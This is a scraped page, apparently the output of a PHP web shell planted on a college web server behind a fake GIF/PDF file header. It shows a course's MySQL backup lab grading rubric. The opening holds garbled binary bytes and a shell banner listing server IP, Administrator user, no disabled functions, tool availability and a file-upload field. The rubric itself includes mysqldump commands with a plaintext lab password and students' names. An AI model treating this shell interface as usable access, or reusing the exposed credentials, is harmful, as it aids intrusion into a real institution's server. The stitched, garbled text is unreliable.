GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1602/Labs/ |
Upload File : |
Lab 3 - Backup Database Grading Criteria Demonstrated assignment effectively: 10 points. There are some things I expect. If they are incorrect you will lose the following: Work submitted incorrectly: -1 pt. This covers errors such as incorrect files names, incorrect file formats, poor formatting, etc. Second and subsequent submission of work for grading: -1 pt. Work submitted late: -1 pt per week. I reserve the right not to apply the deduction points at my absolute discretion. .cmd file: PC: "C:\Program Files\MySQL\MySQL Server 8.0\bin\mysqldump" --databases classicmodels --user=classicmodels_backup --password=classicmodels_backup --result-file=JackWidmer_Lab03.sql MAC: /usr/local/mysql/bin/mysqldump -u classicmodels_backup -pclassicmodels_backup classicmodels --result-file Desktop/Ridgewater/CST1602/Lab03/DevinLong_Lab03.sql -0 Modern command files us the extension .cmd instead of .bat. -1 You have an illegal command in your.cmd file on line 2. Privileges: PROCESS ON *.* (connect to database) SELECT, LOCK TABLES, SHOW VIES, EVENT, TRigger ON classicmodels -1 You granted more privileges to classicmodels_backup than are needed to perform a database backup.